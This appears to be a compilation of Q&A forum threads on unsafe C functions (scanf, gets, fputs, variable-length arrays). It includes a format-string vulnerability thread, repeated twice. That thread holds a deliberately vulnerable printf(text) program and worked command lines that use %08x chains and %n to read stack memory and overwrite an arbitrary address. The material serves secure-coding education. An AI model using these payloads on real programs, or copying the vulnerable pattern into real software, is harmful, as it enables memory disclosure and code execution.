scanf Cppcheck warning - c

Cppcheck shows the following warning for scanf:
Message: scanf without field width limits can crash with huge input data. To fix this error message add a field width specifier:
%s => %20s
%i => %3i
Sample program that can crash:
#include
int main()
{
int a;
scanf("%i", &a);
return 0;
}
To make it crash:
perl -e 'print "5"x2100000' | ./a.out
I cannot crash this program typing "huge input data". What exactly should I type to get this crash? I also don't understand the meaning of the last line in this warning:
perl -e ...

The last line is an example command to run to demonstrate the crash with the sample program. It essentially causes perl to print 2.100.000 times "5" and then pass this to the stdin of the program "a.out" (which is meant to be the compiled sample program).
First of all, scanf() should be used for testing only, not in real world programs due to several issues it won't handle gracefully (e.g. asking for "%i" but user inputs "12345abc" (the "abc" will stay in stdin and might cause following inputs to be filled without a chance for the user to change them).
Regarding this issue: scanf() will know it should read a integer value, however it won't know how long it can be. The pointer could point to a 16 bit integer, 32 bit integer, or a 64 bit integer or something even bigger (which it isn't aware off). Functions with a variable number of arguments (defined with ...) don't know the exact datatype of elements passed, so it has to rely on the format string (reason for the format tags to not be optional like in C# where you just number them, e.g. "{0} {1} {2}"). And without a given length it has to assume some length which might be platform dependant as well (making the function even more unsave to use).
In general, consider it possibly harmful and a starting point for buffer overflow attacks. If you'd like to secure and optimize your program, start by replacing it with alternatives.

I tried running the perl expression against the C program and it did crash here on Linux (segmentation fault).

Using of 'scanf' (or fscanf and sscanf) function in real-world applications usually is not recommended at all because it's not safe and it's usually a hole for buffer overrun if some incorrect input data will be supplied.
There are much more secure ways to input numbers in many commonly used libraries for C++ (QT, runtime libraries for Microsoft Visual C++ etc.). Probably you can find secure alternatives for "pure" C language too.

Related

Creating a user length defined array in C

I'm trying to make an array with variable starting length to get a string. The code should count the words and adjust the size of the array, but this is only a test and I expose it here because I want to know if it's a good practice or one error. And if there is something I should know about, or I must have in mind.
Note, I talk about C, not C++
#include <stdio.h>
int main()
{ int c,b,count;
scanf("%d",&c);
count=c+1;
getchar();
char a[count];
for ( c=b=0 ; c!=count && b!='\n' ; c++ )
{
b=getchar();
a[c]=b;
}
a[c]='\0';
printf("%s",a); printf("%d",c-1);
}
I don't need change the size of the array at the execution time.
I was testing and I don't remember well why I'm using the c variable at first time instead of count directly, but I remember the first getchar was to flush the buffer, because it didn't work without the getchar.
I don't know why I need to put getchar. If I delete the getchar the program fails.
Anyway the program works fine. The first time you run, it expects a number with scanf and then expects the text.
If the text is larger than the size of the array the program will ignore it.
The number is the size of the array.
My questions are:
It is a good practice do a[variable] to do this job?
Why I need the getchar?
It will be portable? I mean, I don't know if some systems or standards don't accept this like some old C compilers or somewhat.
There are better methods?
It is a good practice do a[variable] to do this job?
It depends on someone's compiler configuration. It has been supported since C99. However since there's not a good reason to use it in such a simple program, use the standard malloc instead. Here's an in-depth discussion of the topic.
Why I need the getchar?
There's likely some input still buffered up in your terminal, and that first character is discarding it. Try printing the value out to the screen to see what it is, that might help as figure it out.
It will be portable?
See my answer to your first question. It will probably work on modern versions of gcc, but for example it doesn't work in Windows C (which is still basically on C89).
It is a good practice do a[variable] to do this job?
Where the size is determined by arbitrary user input without imposed limits, it is not good practice. A user could easily enter a very large value and overrun the stack.
Use either dynamic allocation, or check and coerce the input value to some sensible limit.
Also worth noting that VLAs are not supported in C++ or some C compilers, so the code lacks portability.
Why I need the getchar?
The user has to enter at least a newline for scanf() to return, but the %d format specifier does not consume non-digit characters, so it remains buffered. However your code is easily broken by entering additional non-digit characters for example "16a<newline>" will assign 16 to c, and the a will be discarded leaving the newline buffered as before. A better solution is:
while( getchar() != `\n` ) {}
It will be portable? I mean, I don't know if some systems or standards don't accept this like some old C compilers or somewhat.
Adoption of C99 VLAs is variable, and in C11 they are optional in any case.
There are better methods?
I hesitate to say "better", but safer and more flexible and portable ways sure. With respect to the array allocation, you could use malloc().
Using malloc or calloc would be a better choice in C
https://www.tutorialspoint.com/c_standard_library/c_function_malloc.htm

Replace deprecated gets()

I am using the SLM toolkit by CMU-Cambridge for some baseline language modeling on language data, but when I run one of the built executables, my system detects a buffer overflow when it tries to execute one of the commands.
Based on this StackOverflow question I noticed that __gets_chk+0x179 caused the problem, and I've found two occurrences of gets/fgets in the source code (evallm.c, also available in this GitHub project someone made) but I do not know how to fix them in a proper/secure way.
The relevant parts of the error message:
*** buffer overflow detected ***: /home/CMU-Cam_Toolkit_v2/bin/evallm terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__gets_chk+0x179)[0x7f613bc719e9]
Aborted
The broken code
# declaration of input string variable
char input_string[500];
# occurence 1
...
while (fgets (wlist_entry, sizeof (wlist_entry),context_cues_fp)) { ... }
...
# occurence 2
...
while (!feof(stdin) && !told_to_quit) {
printf("evallm : ");
gets(input_string);
....
The error basically occurred when the input_string I gave to the evallm command was too long. Normally it is to be called from the command line and you can interactively pass arguments. However, I piped all arguments together with the command (as seen in the example of the docs) but apparently sometimes my argument names where taking too much bytes. When I changed the array length of input_string from 500 to 2000 the problem was solved (so I guess the error was due to occurence 2). But I really would like to fix it by replacing gets() by getline() since it seems to be the right way to go. Or is replacing it by fgets() also a solution? If so, what parameters should I use?
However, when trying to replace gets(), I always get compiling errors. I'm not a C-programmer (Python, Java) and I'm not familiar with the syntax of getline(), so I'm struggling to find the right parameters.
In your particular case, you know that input_string is an array of 500 bytes. (Of course, you could replace that 500 with e.g. 2048)
I am paranoid, adept of defensive programming, and I would zero that buffer before any input, e.g.
memset(input_string, 0, sizeof(input_string));
So the buffer is cleared, even when fgets has failed. In most cases that is in principle useless. But you have corner cases and the evil is in the details.
So read documentation of fgets(3) and replace the gets call with
fgets(input_string, sizeof(input_string), stdin);
(you actually should handle corner cases, e.g. failure of fgets and input line longer than input_string ....)
Of course, you may want to zero the terminating newline. For that, add
int input_len = strlen(input_string);
if (input_len>0) input_string[input_len-1] = '\0`;
(as commented, you might clear the input_string less often, e.g. at start and on fgets failure)
Notice that getline(3) is POSIX specific and is managing a heap-allocated buffer. Read about C dynamic memory allocation. If you are unfamiliar with C programming, that might be tricky to you. BTW, you could even consider using the Linux specific readline(3)
The main point is your familiarity with C programming.
NB: in C, # does not start a comment, but a preprocessor directive.
You replace gets with fgets.
It's almost that simple, the difference (besides the arguments) is that with fgets there might be a newline at the end of the buffer. (Note I say it might be there.)
I recommend this fgets reference.

Why is it better to use `%s` to print a string using `printf` rather than printing it directly? [duplicate]

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
int main(int argc, char **argv)
{
char text[1024];
static int some_value = -72;
strcpy(text, argv[1]); /* ignore the buffer overflow here */
printf("This is how you print correctly:\n");
printf("%s", text);
printf("This is how not to print:\n");
printf(text);
printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
return(0);
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.

c : gets() and fputs() are dangerous functions?

In the computer lab at school we wrote a program using fputs and the compiler returned an error gets is a dangerous function to use and a similar error for fputs
but at home when i type in this bit of code:
#include <stdio.h>
main()
{
FILE *fp;
char name[20];
fp = fopen("name.txt","w");
gets(name);
fputs(name,fp);
fclose(fp);
}
i get no errors what so ever. The one at school was similar to this one, just a bit lengthy and having more variables.
I use codeblocks at home and the default gcc provided with fedora at school.
Could it be a problem with the compiler?
With gets you need exactly know how many characters you will read and accordingly use a large enough buffer. If you use a buffer which is lesser than the contents of the file you read, you end up writing beyond the bounds of your allocated buffer and this results in an Undefined Behavior and an Invalid program.
Instead you should use fgets which allows you to specify how much data to read.
You don't get any errors because most likely your allocated buffer name is big enough to hold the contents of you file name.txt but if it was not then its a problem and hence the compiler issues the warning.
gets is certainly dangerous since there's no way to prevent buffer overflow.
For example, if your user entered 150 characters, that would almost certainly cause problems for your program. Use of scanf with an unbounded "%s" format specifier should also be avoided for input you have no control over.
However, the use of gets should not be an error since it complies with the standard. At most, it should be a warning (unless you, as the developer, configures something like "treat warnings as errors").
fputs is fine, not dangerous at all.
See here for a robust user input function, using fgets, which can be used to prevent buffer overflow.
It would just be the different settings of the different compilers. Maybe the compiler that Codeblocks uses isn't as verbose or has warnings turned off.
Regardless of the compiler they are dangerous functions to use as they have no checks for buffer overflow. Use fgets or fputs instead.
The other answers have all addressed gets, which is really and truly dangerous.
But the question also mentioned fputs. The fputs function is perfectly safe; it does not have these kinds of security concerns.
I believe the OP was probably mistaken in suggesting that the compiler had warned about fputs.
As for problems, there isn't any problem with any of the compilers. If you look at the link provided by Timothy Jones, you would understand why this warning is issued. As for different versions of compiler, compilers are configured differently to issue different levels of warning.

How can a Format-String vulnerability be exploited?

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
int main(int argc, char **argv)
{
char text[1024];
static int some_value = -72;
strcpy(text, argv[1]); /* ignore the buffer overflow here */
printf("This is how you print correctly:\n");
printf("%s", text);
printf("This is how not to print:\n");
printf(text);
printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
return(0);
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.

Resources